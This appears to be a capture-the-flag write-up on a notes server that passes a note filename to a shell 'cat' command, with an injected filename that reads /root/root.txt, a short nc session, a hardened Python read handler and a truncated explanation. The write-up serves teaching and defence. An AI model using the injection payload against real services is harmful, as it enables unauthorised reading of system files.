
🛠️ CTF Write‑up – PythonSSS (notes server)

Goal: exfiltrate /root/root.txt, which is created when the Docker image is built.


1 · Quick Recon


2 · Triggering RCE (the 1‑packet version)

We only need menu option 3 = “Ler Anotação”.

Send a filename that closes the first cat command, runs our own, then comments‑out the rest:

"; cat /root/root.txt ; #

How it looks on the wire:

$ nc target 4444
PythonSuperSecureServer | Desenvolvido por F4, o estagiario.
<https://github.com/RonaldLSB>

1 - Criar uma anotacao
2 - Listar anotacoes Existentes
3 - Ler Anotacao
4 - sair

Escolha uma opcao: 3
Nome da anotacao que deseja ler (Ex: Exemplo): "; cat /root/root.txt ; #

B{flag}
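
A hardened read handler for the session above, as an added example rather than the server's own code: the note name is checked against an allowlist and the file is read without a shell, so the filename sent in option 3 is rejected. The name policy and the function names (`note_path`, `read_note`, `read_note_via_cat`) are assumptions; only the `notes` directory and the `.txt` suffix come from this write-up.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Assumed policy: note names are short and limited to letters, digits, "_" and "-".
NAME_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

class InvalidNoteName(ValueError):
    """Raised when a requested note name is not acceptable."""

def note_path(name: str, notes_dir: Path) -> Path:
    """Map a user-supplied note name to a file directly inside notes_dir."""
    if not NAME_RE.fullmatch(name):
        raise InvalidNoteName(f"rejected note name: {name!r}")
    base = notes_dir.resolve()
    path = (base / f"{name}.txt").resolve()  # resolve() follows symlinks
    if path.parent != base:                  # e.g. a symlink pointing outside notes_dir
        raise InvalidNoteName(f"note escapes notes directory: {name!r}")
    return path

def read_note(name: str, notes_dir: Path) -> str:
    """Read the note in-process: no shell and no child process."""
    return note_path(name, notes_dir).read_text(encoding="utf-8", errors="replace")

def read_note_via_cat(name: str, notes_dir: Path) -> str:
    """If cat must be used, pass an argument list so no shell parses the name."""
    argv = ["cat", "--", str(note_path(name, notes_dir))]
    return subprocess.run(argv, capture_output=True, text=True, check=True).stdout

def demo() -> dict:
    """Constructed sample data: one note, then the filename from the session."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        notes = Path(tmp) / "notes"
        notes.mkdir()
        (notes / "Exemplo.txt").write_text("hello\n", encoding="utf-8")
        results["Exemplo"] = read_note("Exemplo", notes)
        for bad in ('"; cat /root/root.txt ; #', "../Exemplo", ""):
            try:
                read_note(bad, notes)
                results[bad] = "read"
            except InvalidNoteName:
                results[bad] = "rejected"
    return results

if __name__ == "__main__":
    for name, outcome in demo().items():
        print(repr(name), "->", repr(outcome))
```

Validation happens once in `note_path`, so both readers reject the same names before any file or process is touched.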

Why it works

The server turns our input into

cat ./notes/"; cat /root/root.txt ; #.txt"

Shell parsing breaks that into

  1. cat ./notes/ (ignored)